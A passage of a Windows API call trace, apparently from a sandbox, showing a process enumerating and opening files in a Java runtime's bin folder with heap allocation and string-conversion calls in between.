cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll", lpUsedDefaultChar=0x0) returned 53 [0094.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0094.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0094.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0094.002] AreFileApisANSI () returned 1 [0094.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0094.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 53 [0094.002] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.003] GetFileType (hFile=0x360) returned 0x1 [0094.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0094.003] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.003] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.003] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.003] CloseHandle (hObject=0x360) returned 1 [0094.003] AreFileApisANSI () returned 1 [0094.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0094.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 53 [0094.004] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.004] GetFileType (hFile=0x360) returned 0x1 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0094.004] CloseHandle (hObject=0x360) returned 1 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.005] AreFileApisANSI () returned 1 [0094.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76020 [0094.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 53 [0094.005] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7c40)) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0094.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.005] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t2k.dll", cAlternateFileName="")) returned 1 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0094.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0094.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0094.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0094.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0094.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0094.006] AreFileApisANSI () returned 1 [0094.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll", lpUsedDefaultChar=0x0) returned 47 [0094.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0094.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0094.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0094.006] AreFileApisANSI () returned 1 [0094.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0094.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71550 [0094.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71550, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 47 [0094.006] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.006] GetFileType (hFile=0x360) returned 0x1 [0094.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0094.007] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.007] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.007] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.007] CloseHandle (hObject=0x360) returned 1 [0094.007] AreFileApisANSI () returned 1 [0094.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0094.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0094.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 47 [0094.007] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.007] GetFileType (hFile=0x360) returned 0x1 [0094.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0094.008] CloseHandle (hObject=0x360) returned 1 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.008] AreFileApisANSI () returned 1 [0094.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0094.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 47 [0094.008] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e440)) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0094.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.008] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tnameserv.exe", cAlternateFileName="TNAMES~1.EXE")) returned 1 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69e30 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0094.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0094.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.009] AreFileApisANSI () returned 1 [0094.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe", lpUsedDefaultChar=0x0) returned 53 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0094.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0094.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.010] AreFileApisANSI () returned 1 [0094.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76020 [0094.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 53 [0094.010] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.010] GetFileType (hFile=0x360) returned 0x1 [0094.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0094.010] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.010] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.011] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.011] CloseHandle (hObject=0x360) returned 1 [0094.011] AreFileApisANSI () returned 1 [0094.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.011] RtlAllocateHeap 